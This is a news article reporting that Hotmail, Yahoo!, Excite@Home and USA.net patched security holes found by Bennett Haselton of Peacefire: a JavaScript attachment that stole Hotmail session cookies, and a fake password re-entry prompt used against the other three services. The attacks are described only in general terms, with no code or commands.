A number of free e-mail providers were rushing Wednesday to repair a rash of security holes.
Microsoft Corp. Wednesday quickly patched a security hole in its free Web-based e-mail service, Hotmail.
“The fix is up and has been implemented on all of the hotmail servers,” a Microsoft spokesperson said Wednesday afternoon. “To our knowledge, no users were affected. We did disable the Hotmail servers for a short time this morning.”
Bug hunter Bennett Haselton, Webmaster for anti-content filtering advocacy organization Peacefire, discovered the flaw, which could allow a hacker to break into an e-mail account using an e-mail message with an attached HTML file.
“When the user views the attached HTML file, their cookies in the Hotmail.MSN.com domain are intercepted and sent to a hostile site; since the cookies are used for authentification, whoever receives them can then log into Hotmail as that user,” Haselton wrote in his description of the exploit. A full description of the exploit is available here.
The exploit uses a JavaScript Trojan horse to intercept the cookie. Hotmail filters JavaScript in e-mail messages but does not filter it in HTML attachments.
Hotmail, owned by Microsoft Corp. , is often a target for hackers due to its more than 50 million accounts.
Haselton also discovered a separate exploit late Tuesday that could foil other Web-based e-mail sites into handing over passwords through a false but convincing password-entry screen.
Yahoo!, Excite@Home and USA.net were found to be vulnerable to the exploit. Microsoft’s Hotmail — a perennial target due to its more than 50 million accounts — was found not to be vulnerable. Hotmail’s HTML e-mail “filter” was already designed to detect an attack of this nature.
Yahoo! Mail safeguarded users from the exploit rapidly, fixing the security hole in about an hour. Excite@Home and USA.net also implemented fixes not long after the security hole was discovered.
Fully described here, the exploit brings up a window, “Session timeout: Please re-enter your password,” when a user clicks “Reply” or “Delete” after reading a hacker’s message. When the password is re-entered, it is sent to a hostile site. The user sees nothing unusual.